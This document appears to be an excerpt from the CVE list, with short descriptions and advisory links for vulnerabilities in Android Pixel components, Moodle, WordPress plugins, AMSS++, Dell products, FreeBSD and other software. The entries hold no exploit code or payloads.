CVE 2024 25994 Candidate An unauthenticated remote attacker can upload a arbitrary script file due to improper input validation. The upload destination is fixed and is write only. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240214)
CVE 2024 25993 Candidate In tmu_reset_tmu_trip_counter of , there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240213)
CVE 2024 25992 Candidate In tmu_tz_control of tmu.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240213)
CVE 2024 25991 Candidate In acpm_tmu_ipc_handler of tmu_plugin.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240213)
CVE 2024 25990 Candidate In pktproc_perftest_gen_rx_packet_sktbuf_mode of link_rx_pktproc.c, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240213)
CVE 2024 2599 Candidate File upload restriction evasion vulnerability in AMSS++ version 4.31. This vulnerability could allow an authenticated user to potentially obtain RCE through webshell, compromising the entire infrastructure. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25989 Candidate In gpu_slc_liveness_update of pixel_gpu_slc.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240213)
CVE 2024 25988 Candidate In SAEMM_DiscloseGuti of SAEMM_RadioMessageCodec.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240213)
CVE 2024 25987 Candidate In pt_sysctl_command of pt.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240213)
CVE 2024 25986 Candidate In ppmp_unprotect_buf of drm_fw.c, there is a possible compromise of protected memory due to a logic error in the code. This could lead to local escalation of privilege to TEE with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240213)
CVE 2024 25985 Candidate In bigo_unlocked_ioctl of bigo.c, there is a possible UAF due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240213)
CVE 2024 25984 Candidate In dumpBatteryDefend of dump_power.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240213)
CVE 2024 25983 Candidate Insufficient checks in a web service made it possible to add comments to the comments block on another user's dashboard when it was not otherwise available (e.g., on their profile page). FEDORA:FEDORA-2024-d2f180202f | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/ | MISC:RHBZ#2264099 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264099 | MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-78300 | URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-78300 | MISC:https://moodle.org/mod/forum/discuss.php?d=455641 | URL:https://moodle.org/mod/forum/discuss.php?d=455641 Assigned (20240213)
CVE 2024 25982 Candidate The link to update all installed language packs did not include the necessary token to prevent a CSRF risk. FEDORA:FEDORA-2024-d2f180202f | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/ | MISC:RHBZ#2264098 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264098 | MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-54749 | URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-54749 | MISC:https://moodle.org/mod/forum/discuss.php?d=455638 | URL:https://moodle.org/mod/forum/discuss.php?d=455638 Assigned (20240213)
CVE 2024 25981 Candidate Separate Groups mode restrictions were not honored when performing a forum export, which would export forum data for all groups. By default this only provided additional access to non-editing teachers. FEDORA:FEDORA-2024-d2f180202f | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/ | MISC:RHBZ#2264097 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264097 | MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-80504 | URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-80504 | MISC:https://moodle.org/mod/forum/discuss.php?d=455637 | URL:https://moodle.org/mod/forum/discuss.php?d=455637 Assigned (20240213)
CVE 2024 25980 Candidate Separate Groups mode restrictions were not honored in the H5P attempts report, which would display users from other groups. By default this only provided additional access to non-editing teachers. FEDORA:FEDORA-2024-d2f180202f | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/ | MISC:RHBZ#2264096 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264096 | MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-80501 | URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-80501 | MISC:https://moodle.org/mod/forum/discuss.php?d=455636 | URL:https://moodle.org/mod/forum/discuss.php?d=455636 Assigned (20240213)
CVE 2024 2598 Candidate Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/modules/book/main/select_send_2.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25979 Candidate The URL parameters accepted by forum search were not limited to the allowed parameters. FEDORA:FEDORA-2024-d2f180202f | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/ | MISC:RHBZ#2264095 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264095 | MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-69774 | URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-69774 | MISC:https://moodle.org/mod/forum/discuss.php?d=455635 | URL:https://moodle.org/mod/forum/discuss.php?d=455635 Assigned (20240213)
CVE 2024 25978 Candidate Insufficient file size checks resulted in a denial of service risk in the file picker's unzip functionality. FEDORA:FEDORA-2024-d2f180202f | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXGBYJ43BUEBUAQZU3DT5I5A3YLF47CB/ | MISC:RHBZ#2264074 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264074 | MISC:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-74641 | URL:http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-74641 | MISC:https://moodle.org/mod/forum/discuss.php?d=455634 | URL:https://moodle.org/mod/forum/discuss.php?d=455634 Assigned (20240213)
CVE 2024 25974 Candidate The Frentix GmbH OpenOlat LMS is affected by stored a Cross-Site Scripting (XSS) vulnerability. It is possible to upload files within the Media Center of OpenOlat version 18.1.5 (or lower) as an authenticated user without any other rights. Although the filetypes are limited, an SVG image containing an XSS payload can be uploaded. After a successful upload the file can be shared with groups of users (including admins) who can be attacked with the JavaScript payload. FULLDISC:20240220 SEC Consult SA-20240220-0 :: Multiple Stored Cross-Site Scripting Vulnerabilities in OpenOLAT (Frentix GmbH) | URL:http://seclists.org/fulldisclosure/2024/Feb/23 | MISC:https://r.sec-consult.com/openolat | URL:https://r.sec-consult.com/openolat Assigned (20240213)
CVE 2024 25973 Candidate The Frentix GmbH OpenOlat LMS is affected by multiple stored Cross-Site Scripting (XSS) vulnerabilities. An attacker with rights to create or edit groups can create a course with a name that contains an XSS payload. Furthermore, attackers with the permissions to create or rename a catalog (sub-category) can enter unfiltered input in the name field. In addition, attackers who are allowed to create curriculums can also enter unfiltered input in the name field. This allows an attacker to execute stored JavaScript code with the permissions of the victim in the context of the user's browser. FULLDISC:20240220 SEC Consult SA-20240220-0 :: Multiple Stored Cross-Site Scripting Vulnerabilities in OpenOLAT (Frentix GmbH) | URL:http://seclists.org/fulldisclosure/2024/Feb/23 | MISC:https://r.sec-consult.com/openolat | URL:https://r.sec-consult.com/openolat Assigned (20240213)
CVE 2024 25972 Candidate Initialization of a resource with an insecure default vulnerability in OET-213H-BTS1 sold in Japan by Atsumi Electric Co., Ltd. allows a network-adjacent unauthenticated attacker to configure and control the affected product. MISC:https://jvn.jp/en/jp/JVN77203800/ | URL:https://jvn.jp/en/jp/JVN77203800/ | MISC:https://www.atsumi.co.jp/info-20240229.html | URL:https://www.atsumi.co.jp/info-20240229.html | MISC:https://www.atsumi.co.jp/pdf/oet-213h-bts1.pdf | URL:https://www.atsumi.co.jp/pdf/oet-213h-bts1.pdf Assigned (20240213)
CVE 2024 2597 Candidate Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/modules/book/main/bookdetail_school_person.php, in the 'b_id' parameter. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25964 Candidate Dell PowerScale OneFS 9.5.0.x through 9.7.0.x contain a covert timing channel vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service. MISC:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities Assigned (20240213)
CVE 2024 2596 Candidate Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/modules/mail/main/select_send.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25951 Candidate A command injection vulnerability exists in local RACADM. A malicious authenticated user could gain control of the underlying operating system. MISC:https://www.dell.com/support/kbdoc/en-us/000222591/dsa-2024-089-security-update-for-dell-idrac8-local-racadm-vulnerability | URL:https://www.dell.com/support/kbdoc/en-us/000222591/dsa-2024-089-security-update-for-dell-idrac8-local-racadm-vulnerability Assigned (20240213)
CVE 2024 2595 Candidate Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/modules/book/main/bookdetail_khet_person.php, in the 'b_id' parameter. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25942 Candidate Dell PowerEdge Server BIOS contains an Improper SMM communication buffer verification vulnerability. A physical high privileged attacker could potentially exploit this vulnerability leading to arbitrary writes to SMRAM. MISC:https://www.dell.com/support/kbdoc/en-us/000223210/dsa-2024-104-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability | URL:https://www.dell.com/support/kbdoc/en-us/000223210/dsa-2024-104-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability Assigned (20240213)
CVE 2024 25941 Candidate The jail(2) system call has not limited a visiblity of allocated TTYs (the kern.ttys sysctl). This gives rise to an information leak about processes outside the current jail. Attacker can get information about TTYs allocated on the host or in other jails. Effectively, the information printed by "pstat -t" may be leaked. MISC:https://security.freebsd.org/advisories/FreeBSD-SA-24:02.tty.asc | URL:https://security.freebsd.org/advisories/FreeBSD-SA-24:02.tty.asc Assigned (20240213)
CVE 2024 25940 Candidate `bhyveload -h <host-path>` may be used to grant loader access to the <host-path> directory tree on the host. Affected versions of bhyveload(8) do not make any attempt to restrict loader's access to <host-path>, allowing the loader to read any file the host user has access to. In the bhyveload(8) model, the host supplies a userboot.so to boot with, but the loader scripts generally come from the guest image. A maliciously crafted script could be used to exfiltrate sensitive data from the host accessible to the user running bhyhveload(8), which is often the system root. MISC:https://security.freebsd.org/advisories/FreeBSD-SA-24:01.bhyveload.asc | URL:https://security.freebsd.org/advisories/FreeBSD-SA-24:01.bhyveload.asc Assigned (20240213)
CVE 2024 2594 Candidate Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/admin/index.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25937 Candidate SQL injection vulnerability exists in the script DIAE_tagHandler.ashx. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 Assigned (20240312)
CVE 2024 25936 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SoundCloud Inc., Lawrie Malen SoundCloud Shortcode allows Stored XSS.This issue affects SoundCloud Shortcode: from n/a through 4.0.1. MISC:https://patchstack.com/database/vulnerability/soundcloud-shortcode/wordpress-soundcloud-shortcode-plugin-4-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/soundcloud-shortcode/wordpress-soundcloud-shortcode-plugin-4-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25935 Candidate Missing Authorization vulnerability in Metagauss RegistrationMagic.This issue affects RegistrationMagic: from n/a through 5.2.5.9. MISC:https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-5-9-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-5-9-broken-access-control-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25934 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FormFacade allows Stored XSS.This issue affects FormFacade: from n/a through 1.0.0. MISC:https://patchstack.com/database/vulnerability/formfacade/wordpress-formfacade-plugin-1-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/formfacade/wordpress-formfacade-plugin-1-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25933 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Pepro Dev. Group PeproDev Ultimate Invoice.This issue affects PeproDev Ultimate Invoice: from n/a through 1.9.7. MISC:https://patchstack.com/database/vulnerability/pepro-ultimate-invoice/wordpress-peprodev-ultimate-invoice-plugin-1-9-7-sensitive-data-exposure-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/pepro-ultimate-invoice/wordpress-peprodev-ultimate-invoice-plugin-1-9-7-sensitive-data-exposure-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25932 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Manish Kumar Agarwal Change Table Prefix.This issue affects Change Table Prefix: from n/a through 2.0. MISC:https://patchstack.com/database/vulnerability/change-table-prefix/wordpress-change-table-prefix-plugin-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/change-table-prefix/wordpress-change-table-prefix-plugin-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25931 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Heureka Group Heureka.This issue affects Heureka: from n/a through 1.0.8. MISC:https://patchstack.com/database/vulnerability/heureka/wordpress-heureka-plugin-1-0-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/heureka/wordpress-heureka-plugin-1-0-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25930 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Nuggethon Custom Order Statuses for WooCommerce.This issue affects Custom Order Statuses for WooCommerce: from n/a through 1.5.2. MISC:https://patchstack.com/database/vulnerability/custom-order-statuses-for-woocommerce/wordpress-custom-order-statuses-for-woocommerce-plugin-1-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/custom-order-statuses-for-woocommerce/wordpress-custom-order-statuses-for-woocommerce-plugin-1-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 2593 Candidate Vulnerability in AMSS++ version 4.31, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /amssplus/modules/book/main/bookdetail_group.php, in the 'b_id' parameter. This vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25928 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sitepact.This issue affects Sitepact: from n/a through 1.0.5. MISC:https://patchstack.com/database/vulnerability/sitepact-klaviyo-contact-form-7/wordpress-sitepact-s-contact-form-7-extension-for-klaviyo-plugin-1-0-5-reflected-xss-via-sql-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/sitepact-klaviyo-contact-form-7/wordpress-sitepact-s-contact-form-7-extension-for-klaviyo-plugin-1-0-5-reflected-xss-via-sql-injection-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25927 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Joel Starnes postMash – custom post order.This issue affects postMash – custom post order: from n/a through 1.2.0. MISC:https://patchstack.com/database/vulnerability/postmash/wordpress-postmash-custom-post-order-plugin-1-2-0-sql-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/postmash/wordpress-postmash-custom-post-order-plugin-1-2-0-sql-injection-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25925 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in SYSBASICS WooCommerce Easy Checkout Field Editor, Fees & Discounts.This issue affects WooCommerce Easy Checkout Field Editor, Fees & Discounts: from n/a through 3.5.12. MISC:https://patchstack.com/database/vulnerability/phppoet-checkout-fields/wordpress-woocommerce-easy-checkout-field-editor-fees-discounts-plugin-3-5-12-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/phppoet-checkout-fields/wordpress-woocommerce-easy-checkout-field-editor-fees-discounts-plugin-3-5-12-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25922 Candidate Missing Authorization vulnerability in Peach Payments Peach Payments Gateway.This issue affects Peach Payments Gateway: from n/a through 3.1.9. MISC:https://patchstack.com/database/vulnerability/wc-peach-payments-gateway/wordpress-peach-payments-gateway-plugin-3-1-9-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wc-peach-payments-gateway/wordpress-peach-payments-gateway-plugin-3-1-9-broken-access-control-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25921 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Concerted Action Action Network allows Reflected XSS.This issue affects Action Network: from n/a through 1.4.2. MISC:https://patchstack.com/database/vulnerability/wp-action-network/wordpress-action-network-plugin-1-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-action-network/wordpress-action-network-plugin-1-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 2592 Candidate Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/person/pic_show.php, in the 'person_id' parameter. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25919 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hiroaki Miyashita Custom Field Template allows Stored XSS.This issue affects Custom Field Template: from n/a through 2.6. MISC:https://patchstack.com/database/vulnerability/custom-field-template/wordpress-custom-field-template-plugin-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/custom-field-template/wordpress-custom-field-template-plugin-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25916 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joseph C Dolson My Calendar allows Stored XSS.This issue affects My Calendar: from n/a through 3.4.23. MISC:https://patchstack.com/database/vulnerability/my-calendar/wordpress-my-calendar-plugin-3-4-23-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/my-calendar/wordpress-my-calendar-plugin-3-4-23-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25915 Candidate Server-Side Request Forgery (SSRF) vulnerability in Raaj Trambadia Pexels: Free Stock Photos.This issue affects Pexels: Free Stock Photos: from n/a through 1.2.2. MISC:https://patchstack.com/database/vulnerability/wp-pexels-free-stock-photos/wordpress-pexels-free-stock-photos-plugin-1-2-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-pexels-free-stock-photos/wordpress-pexels-free-stock-photos-plugin-1-2-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25914 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Photoboxone SMTP Mail.This issue affects SMTP Mail: from n/a through 1.3.20. MISC:https://patchstack.com/database/vulnerability/smtp-mail/wordpress-smtp-mail-plugin-1-3-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/smtp-mail/wordpress-smtp-mail-plugin-1-3-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25913 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in Skymoonlabs MoveTo.This issue affects MoveTo: from n/a through 6.2. MISC:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25912 Candidate Missing Authorization vulnerability in Skymoonlabs MoveTo.This issue affects MoveTo: from n/a through 6.2. MISC:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-arbitrary-wordpress-settings-change-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-arbitrary-wordpress-settings-change-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25910 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Skymoonlabs MoveTo.This issue affects MoveTo: from n/a through 6.2. MISC:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-sql-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/moveto/wordpress-moveto-plugin-6-2-unauthenticated-sql-injection-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 2591 Candidate Vulnerability in AMSS++ version 4.31 that allows SQL injection through /amssplus/modules/book/main/bookdetail_group.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the DB. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amssplus-amss Assigned (20240318)
CVE 2024 25909 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in JoomUnited WP Media folder.This issue affects WP Media folder: from n/a through 5.7.2. MISC:https://patchstack.com/database/vulnerability/wp-media-folder/wordpress-wp-media-folder-plugin-5-7-2-subscriber-arbitrary-file-upload-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-media-folder/wordpress-wp-media-folder-plugin-5-7-2-subscriber-arbitrary-file-upload-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25908 Candidate Missing Authorization vulnerability in JoomUnited WP Media folder.This issue affects WP Media folder: from n/a through 5.7.2. MISC:https://patchstack.com/database/vulnerability/wp-media-folder/wordpress-wp-media-folder-plugin-5-7-2-subscriber-arbitrary-post-page-modification-title-excerpt-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-media-folder/wordpress-wp-media-folder-plugin-5-7-2-subscriber-arbitrary-post-page-modification-title-excerpt-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25905 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Mondula GmbH Multi Step Form.This issue affects Multi Step Form: from n/a through 1.7.18. MISC:https://patchstack.com/database/vulnerability/multi-step-form/wordpress-multi-step-form-plugin-1-7-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/multi-step-form/wordpress-multi-step-form-plugin-1-7-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25904 Candidate Cross-Site Request Forgery (CSRF) vulnerability in David Stockl TinyMCE and TinyMCE Advanced Professsional Formats and Styles.This issue affects TinyMCE and TinyMCE Advanced Professsional Formats and Styles: from n/a through 1.1.2. MISC:https://patchstack.com/database/vulnerability/tinymce-and-tinymce-advanced-professsional-formats-and-styles/wordpress-tinymce-and-tinymce-advanced-professsional-formats-and-styles-plugin-1-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/tinymce-and-tinymce-advanced-professsional-formats-and-styles/wordpress-tinymce-and-tinymce-advanced-professsional-formats-and-styles-plugin-1-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240212)
CVE 2024 25903 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in N-Media Frontend File Manager.This issue affects Frontend File Manager: from n/a through 22.7. MISC:https://patchstack.com/database/vulnerability/nmedia-user-file-uploader/wordpress-frontend-file-manager-plugin-plugin-22-7-sensitive-data-exposure-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/nmedia-user-file-uploader/wordpress-frontend-file-manager-plugin-plugin-22-7-sensitive-data-exposure-vulnerability?_s_id=cve Assigned (20240212)
